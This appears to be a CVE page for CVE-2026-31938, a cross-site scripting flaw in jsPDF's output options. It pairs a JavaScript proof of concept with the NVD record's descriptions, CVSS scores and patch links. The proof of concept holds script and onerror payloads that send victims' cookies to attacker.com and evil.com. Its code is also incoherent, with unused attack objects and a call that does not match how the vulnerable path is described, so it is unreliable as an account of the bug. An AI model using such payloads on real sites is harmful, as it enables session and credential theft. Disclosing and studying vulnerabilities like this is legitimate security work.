CVE-2026-31938

// CVE-2026-31938 PoC - jsPDF XSS via output options // This PoC demonstrates injecting arbitrary HTML/JS through output function // Vulnerable code pattern (jsPDF < 4.2.1) const { jsPDF } = require('jspdf'); function generateMaliciousPDF(userProvidedOptions) { const doc = new jsPDF(); doc.text('Test PDF', 10, 10); // Vulnerable: user input directly passed to output without sanitization const outputOptions = userProvidedOptions; // Attack vector example - inject script via output options const maliciousOptions = { fileName: 'document.pdf', output: '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>' }; // Another attack vector - event handler injection const eventHandlerOptions = { output: '<img src=x onerror="fetch(\"https://attacker.com/exfil?data=\"+btoa(document.cookie))">' }; // Generate PDF with malicious options doc.output(maliciousOptions); return doc; } // Simulated attack scenario const attackerInput = { outputType: 'datauristring', data: '<script>document.location="https://evil.com/log?c="+document.cookie</script>' }; // When victim opens the generated PDF, the script executes in their browser context

{"cve": {"id": "CVE-2026-31938", "sourceIdentifier": "[email protected]", "published": "2026-03-18T04:17:23.507", "lastModified": "2026-03-18T18:02:15.640", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "jsPDF is a library to generate PDFs in JavaScript. Prior to version 4.2.1, user control of the `options` argument of the `output` function allows attackers to inject arbitrary HTML (such as scripts) into the browser context the created PDF is opened in. The vulnerability can be exploited in the following scenario: the attacker provides values for the output options, for example via a web interface. These values are then passed unsanitized (automatically or semi-automatically) to the attack victim. The victim creates and opens a PDF with the attack vector using one of the vulnerable method overloads inside their browser. The attacker can thus inject scripts that run in the victims browser context and can extract or modify secrets from this context. The vulnerability has been fixed in [email protected]. As a workaround, sanitize user input before passing it to the output method."}, {"lang": "es", "value": "jsPDF es una biblioteca para generar PDFs en JavaScript. Antes de la versión 4.2.1, el control del usuario sobre el argumento 'options' de la función 'output' permite a los atacantes inyectar HTML arbitrario (como scripts) en el contexto del navegador en el que se abre el PDF creado. La vulnerabilidad puede ser explotada en el siguiente escenario: el atacante proporciona valores para las opciones de salida, por ejemplo, a través de una interfaz web. Estos valores se pasan luego sin sanear (automática o semi-automáticamente) a la víctima del ataque. La víctima crea y abre un PDF con el vector de ataque utilizando una de las sobrecargas de método vulnerables dentro de su navegador. El atacante puede así inyectar scripts que se ejecutan en el contexto del navegador de la víctima y puede extraer o modificar secretos de este contexto. La vulnerabilidad ha sido corregida en [email protected]. Como solución alternativa, sanear la entrada del usuario antes de pasarla al método de salida."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:parall:jspdf:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "4.2.1", "matchCriteriaId": "E32C16E0-23FB-49ED-B364-2170D7FC9935"}]}]}], "references": [{"url": "https://github.com/parallax/jsPDF/commit/87a40bbd07e6b30575196370670b41f264aa78d7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-wfv2-pwc8-crg5", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}